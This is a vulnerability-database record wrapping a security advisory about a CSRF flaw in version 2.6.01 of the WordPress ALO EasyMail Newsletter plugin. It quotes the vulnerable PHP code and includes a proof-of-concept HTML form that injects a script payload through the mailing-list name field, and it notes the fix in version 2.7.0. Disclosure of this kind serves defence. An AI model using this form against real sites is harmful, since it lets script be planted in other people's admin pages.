{"id": "PACKETSTORM:135780", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress ALO EasyMail Newsletter 2.6.01 CSRF", "description": "", "published": "2016-02-16T00:00:00", "modified": "2016-02-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/135780/WordPress-ALO-EasyMail-Newsletter-2.6.01-CSRF.html", "reporter": "Mohsen Lotfi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:53", "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/135780/wpaloeasymailnewsletter-xsrf.txt", "sourceData": "`# Exploit Title: WordPress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability \n# Software Link: https://wordpress.org/plugins/alo-easymail/ \n# Affected Version: 2.6.01 \n# Exploit Author: Mohsen Lotfi \n# Contact: mohsen.lotfi.all@gmail.com \n# Twitter: fox_one_fox_one \n# Date: 01-16-2016 \n \n##################### \n1. Description \n##################### \n \nThe plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack. \n \nScript insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php : \n \ncase \"save_list\": // SAVE a mailing list (add or update) \nif ( isset($_REQUEST['submit_list']) ) { \n//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) ); \n \n// List name \n$list_name = array(); \nforeach ( $languages as $key => $lang ) { \nif (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */ \n} \n \n$list_available = stripslashes( trim( $_POST['elp_list_available'] ) ); \n$list_order = stripslashes( trim( $_POST['elp_list_order'] ) ); \nif ( $list_name && $list_available && is_numeric($list_order) ) { \n$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' ); \nif ( $list_id ) { // update \n$mailinglists [$list_id] = array ( \"name\" => $list_name, \"available\" => $list_available, \"order\" => $list_order ); \n} else { // or add a new \nif ( empty($mailinglists) ) { // if 1st list, skip index 0 \n$mailinglists [] = array ( \"name\" => \"not-used\", \"available\" => \"deleted\", \"order\" => \"\"); \n} \n$mailinglists [] = array ( \"name\" => $list_name, \"available\" => $list_available, \"order\" => $list_order); \n} \nif ( alo_em_save_mailinglists ( $mailinglists ) ) { \nunset ( $list_id ); \nunset ( $list_name ); \nunset ( $list_available ); \nunset ( $list_order ); \necho '<div id=\"message\" class=\"updated fade\"><p>'. __(\"Updated\", \"alo-easymail\") .'</p></div>'; \n} else { \necho '<div id=\"message\" class=\"error\"><p>'. __(\"Error during operation.\", \"alo-easymail\") .'</p></div>'; \n} \n} else { \necho '<div id=\"message\" class=\"error\"><p>'. __(\"Inputs are incompled or wrong. Please check and try again.\", \"alo-easymail\") .'</p></div>'; \n} \n} \nbreak; \n \n \n##################### \n2. Proof of Concept \n##################### \n \nLog in as a regular user, then: \n \n<form method=\"post\" action=\"http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php\"> \n<input type=\"hidden\" name=\"listname_en\" value=\"<script>alert('xss')</script>\"> \n<input type=\"hidden\" name=\"elp_list_available\" value=\"hidden\"> \n<input type=\"hidden\" name=\"elp_list_order\" value=\"0\"> \n<input type=\"hidden\" name=\"user_ID\" value=\"1\"> \n<input type=\"hidden\" name=\"task\" value=\"save_list\"> \n<input type=\"hidden\" name=\"list_id\" value=\"\"> \n<input type=\"submit\" name=\"submit_list\" value=\"Trigger!\"> \n</form> \n \n \n##################### \n3. Solution \n##################### \n \nUpdate to version 2.7.0 \nhttps://wordpress.org/plugins/alo-easymail/changelog/ \n \n##################### \n4. Report Timeline \n##################### \n \n01-16-2016 : Vulnerability discovered. \n01-25-2016 : Vendor notified of vulnerability. \n02-07-2016 : Vendor replied and released fixed version. \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647666985}}